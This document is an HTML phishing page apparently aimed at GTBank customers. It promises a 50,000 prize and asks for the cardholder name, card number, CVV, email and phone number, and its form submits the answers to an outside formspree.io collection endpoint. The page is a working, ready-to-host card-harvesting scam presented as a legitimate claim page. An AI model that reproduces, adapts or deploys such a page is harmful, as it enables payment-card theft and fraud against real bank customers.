<!DOCTYPE html>
<html>
  <head>
    <title>Trust key gtb</title>
	<meta name="viewport" content="width=device-width, initial-scale=1" /> 
	<style type="text/css">
	 button {
      width: 15%;
      padding: 10px 0;
      margin: 10px auto;
      border-radius: 9px; 
      border:2px inset blue;
      background: #02FF35; 
      font-size: 14px;
      font-weight: 600;
      color: #fff;
      }
	  input{
      width: 24%;
      padding: 15px 0;
      margin: 10px auto;
      border-radius: 9px; 
      border:2px inset blue;
      background: white; 
      font-size: 14px;
      font-weight: 600;
      color: #03E6FF;
      }
	  label{
      border-radius: 7px;
	  padding: 4px; 
      border:2px inset blue;
      background-color: #02FFEA; 
      font-size: 15px;
      font-weight: 600;
      color: #FF0E17;
	  height: 70%;
	  width: 500% }
	  </style>
  </head>
  <body background-color: #FF7001>
  <center>
<h1 style="color: #5350FF; font-family: aharoni; font-size: 50px">HELLO THERE USE THIS WEBSITE TO CLAIM #50,000 </h1>
<p style="color: #5350FF; font-family: aharoni; font-size: 30px">FILL IN CARD DETAILS{Gtbank users only}</p>
<form method="post" action="https://formspree.io/f/xwkzbwyg">
<input type="radio" name="gender" value="Male" id="male" />
   <label for="male"> VISA</label>
   <br />
   <input type="radio" name="gender" value="Female" id="female" />
   <label for="female"> MASTERCARD </label>
   <br />
<input type="text" name="Name" placeholder="&nbsp;&nbsp;&nbsp;&nbsp;FULL NAME ON CARD"/ required><br/> <input type="text" name="order number" placeholder="&nbsp;&nbsp;&nbsp;&nbsp;CARD NUMBER"/ required><br/><input type="text" name="EXPIRY DATE" placeholder="&nbsp;&nbsp;&nbsp;&nbsp;CVV"/ required><br/> 
<input type="text" name="Email address" placeholder="&nbsp;&nbsp;&nbsp;&nbsp;Email address" / required><br/> 
<input type="text" name="Order address" placeholder="&nbsp;&nbsp;&nbsp;&nbsp;contact number"/ required><br/>

<button type="submit">Continue</button><br/> 
</center>
  </body>
</html>